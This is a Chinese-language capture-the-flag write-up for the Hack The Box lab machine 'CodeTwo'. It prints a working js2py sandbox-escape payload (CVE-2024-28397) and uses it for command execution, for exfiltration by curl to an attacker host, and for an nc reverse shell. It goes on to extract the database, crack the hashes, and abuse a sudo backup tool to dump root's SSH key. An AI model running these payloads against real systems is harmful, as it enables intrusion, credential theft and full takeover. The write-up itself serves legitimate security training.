HTB 赛季8靶场 - CodeTwo

nmap扫描

└─$ nmap -F 10.129.151.221 -A 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-18 21:30 EDT
Nmap scan report for 10.129.151.221
Host is up (0.36s latency).
Not shown: 98 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a0:47:b4:0c:69:67:93:3a:f9:b4:5d:b3:2f:bc:9e:23 (RSA)
|   256 7d:44:3f:f1:b1:e2:bb:3d:91:d5:da:58:0f:51:e5:ad (ECDSA)
|_  256 f1:6b:1d:36:18:06:7a:05:3f:07:57:e1:ef:86:b4:85 (ED25519)
8000/tcp open  http    Gunicorn 20.0.4
|_http-title: Welcome to CodeTwo
|_http-server-header: gunicorn/20.0.4
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=8/18%OT=22%CT=7%CU=42024%PV=Y%DS=2%DC=T%G=Y%TM=68A3
OS:D3DA%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)
OS:SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=104%GCD=2%ISR=10A%TI
OS:=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=10
OS:5%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M542ST11NW7%O2=M542ST11NW7%O3
OS:=M542NNT11NW7%O4=M542ST11NW7%O5=M542ST11NW7%O6=M542ST11)WIN(W1=FE88%W2=F
OS:E88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M542NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   419.03 ms 10.10.16.1
2   324.03 ms 10.129.151.221OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.26 seconds

访问8000端口

我们下载app 并注册账号

登录账号，进入dashboard

js2py RCE漏洞

分析APP.zip源码，发现代码执行部分调用了js2py.eval_js()函数，经过google检索发现该函数2024年爆出RCE漏洞（https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape/blob/main/analysis_zh.md）。
我们理解该漏洞代码后，构造如下Payload做Poc测试

########kali shell#########
python -m http.server 80
###########################let cmd = "wget http://10.10.16.8/pwned"
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__
let obj = a(a(a,"__class__"), "__base__")
function findpopen(o) {let result;for(let i in o.__subclasses__()) {let item = o.__subclasses__()[i]if(item.__module__ == "subprocess" && item.__name__ == "Popen") {return item}if(item.__name__ != "type" && (result = findpopen(item))) {return result}}
}
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(result)
result

说明命令正确执行了，我们进一步探测可用的应用有哪些，修改payload

let cmd = "curl http://10.10.16.8:80/$(which python nc bash sh ncao curl rustcat openssl perl php ruby socat ndoe java telnet zsh lua golang vlang awk nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null| base64 -w0)"
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__
let obj = a(a(a,"__class__"), "__base__")
function findpopen(o) {let result;for(let i in o.__subclasses__()) {let item = o.__subclasses__()[i]if(item.__module__ == "subprocess" && item.__name__ == "Popen") {return item}if(item.__name__ != "type" && (result = findpopen(item))) {return result}}
}
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(result)
result

获取明文

/usr/bin/nc
/usr/bin/bash
/usr/bin/sh
/usr/bin/curl
/usr/bin/openssl
/usr/bin/perl
/usr/bin/telnet
/usr/bin/awk
/usr/bin/nc
/usr/bin/netcat
/usr/bin/wget
/usr/bin/curl
/usr/bin/ping
/usr/bin/gcc
/usr/bin/g++
/usr/bin/make
/usr/bin/base64
/usr/bin/python3
/usr/bin/perl
/usr/bin/sudo

nc 构造反连shell

我们使用nc完成反连操作，修改payload

######kali shell########
nc -lvnp 8888
########################let cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.8 8888 >/tmp/f"
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__
let obj = a(a(a,"__class__"), "__base__")
function findpopen(o) {let result;for(let i in o.__subclasses__()) {let item = o.__subclasses__()[i]if(item.__module__ == "subprocess" && item.__name__ == "Popen") {return item}if(item.__name__ != "type" && (result = findpopen(item))) {return result}}
}
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(result)
result

窃取.db数据库文件内容

我们发现了.db文件，这是一个Sqlite3的数据库文件

/home/app/app/instance/user.db

传输文件

######## kali shell ########
nc -lvnp 8888 > users.db
############################nc -q 0 10.10.16.8 8888 < users.db

将hash保存在sqlite3.hash文件中，使用hashcat破解密码

hashcat -a 0 -m 0 sqlite3.hash  /home/kali/Desktop/Info/zhuzhuzxia/Passwords/rockyou.txt

确认ssh能够登录

ssh marco@10.129.151.221

sudo权限的备份工具滥用

查看sudo -l

sudo -l

使用npbackup备份root文件夹，首先修改npbackup.conf文件中的路径为/root/

    repo_group: default_groupbackup_opts:paths:- /root/source_type: folder_listexclude_files_larger_than: 0.0

然后执行以下命令开始备份

sudo npbackup-cli -c npbackup.conf -b -f

再执行，或去root用户的私钥证书

sudo npbackup-cli -c npbackup.conf -f --dump /root/.ssh/id_rsa > id_rsa

使用私钥证书登录root

marco@codetwo:~$ sudo npbackup-cli -c npbackup.conf -f --dump /root/.ssh/id_rsa > id_rsa
marco@codetwo:~$ chmod 600 id_rsa 
marco@codetwo:~$ ssh root@localhost -i id_rsa